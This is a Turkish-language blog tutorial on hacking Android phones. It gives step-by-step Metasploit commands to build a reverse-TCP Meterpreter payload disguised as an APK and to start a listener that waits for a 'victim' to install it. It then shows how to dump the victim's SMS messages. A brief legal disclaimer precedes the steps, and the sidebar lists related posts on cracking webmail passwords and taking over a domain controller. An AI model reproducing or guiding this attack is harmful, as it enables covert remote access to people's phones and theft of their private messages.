Android Telefonlara Nasıl Sızılır ( Hack )

Merhabalar , uzun zamandan beri yoğunluklardan dolayı makale yazamıyordum . Boş bir vakit bulmuşken hemen birtane yazayım dedim :) bu makalemizde android telefonlara nasıl sızılabilir biraz bu konudan bahsedeceğim .

Not : Yapılan bu işlem izinsiz bir şekilde yapılır ise SUÇ’tur . Şuanda ise sadece test amaçlı yapılmıştır .Herhangi bir yasal konuda Mesuliyet Kabul Etmiyorum !!

Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

Adım 2 : " msfconsole " komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .
Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;
> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)
Adım 4 : Ve kurban yazılımı çalıştırarak bize reversse bağlantı göndermiş durumda :)
Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için " help " komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.
Adım 6 : Örnek olarak telefondaki SMS'lere bakalım . Bunun için " dump_sms " komutunu kullanıyoruz.
Ve SMS'leri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik :) .

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Hydra İle BruteForce Attack Yaparak Nasil Hotmail/Gmail/Yahoo Şifreleri Kırılır ( Hacking )

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Sızma Testi Senaryosu - Bölüm 1